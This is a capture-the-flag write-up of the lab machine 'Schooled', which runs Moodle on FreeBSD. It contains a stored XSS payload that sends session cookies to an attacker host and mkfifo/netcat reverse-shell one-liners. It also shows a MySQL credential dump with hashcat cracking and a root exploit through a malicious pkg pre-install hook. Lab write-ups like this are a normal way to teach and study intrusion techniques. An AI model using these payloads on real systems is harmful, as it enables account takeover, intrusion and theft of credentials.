namp Scan:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9 (FreeBSD 20200214;
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.46 ((FreeBSD)
Service Info: OS: FreeBSD;port 80 serves a web service, which says All content will be delivered over Moodle.
enumerating its subdomain
gobuster dns -d erev0s.com -w su 0 -i
Lets get it :)
So Lets enumerate more…
Once we enroll the courses we can see some instructions.
MoodleNet profiles to be set hmm…
lets check some exploits for moodle
Ah we got some xss, lets check that out
Stored XSS Works as intended.
So as the maths teacher said he will be checking the profile id, so using stored xss we can steal cookies and login as that teacher.
XSS Payload
<img src='x' onerror='fetch("http://[IP]/?data=" + btoa(document.cookie));'>sudo python3 -m http.server <port>
So replacing my cookie with teachers cookie, we can take over the teachers
Hmm.. there is a RCE vulnerability
Using this Vulnerability, we were able to do RCE, to get a shell we will be using webwrap.
python3 webwrap.py http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=WRAPand netcat to get a proper stable shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port>>/tmp/f
Enumerating we can see that there are two users
We don’t have access though, enumerating, we can see moodle uses mysql, so find config.php of model revels the mysql username and password
config.php
/usr/local/www/apache24/data/moodle
Locating mysql, /usr/local/bin
./mysql -u moodle -pPlaybookMaster2020 -D moodle -e 'SELECT username, password FROM mdl_user ORDER BY username;'
Gives admin username and password, cracking the password with hashcat
hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt
Login as admin we can see that
So he is one of the user which we found, SSH this user
Enumerating, we can see that we have sudo permission for package install,
#!/bin/bash
STAGEDIR=/tmp/package
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_INSTALL <<EOF
# careful here, this may clobber your system
echo “Resetting root shell”
rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 10.10.14.7 9080 >/tmp/a
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo “Registering root shell”
pw usermod -n root -s /bin/sh
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: “1.0_5”
origin: sysutils/mypackage
comment: “automates stuff”
desc: “automates tasks which can also be undone later”
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .mkdir /temp/package
Installing this package gives us the super user shell
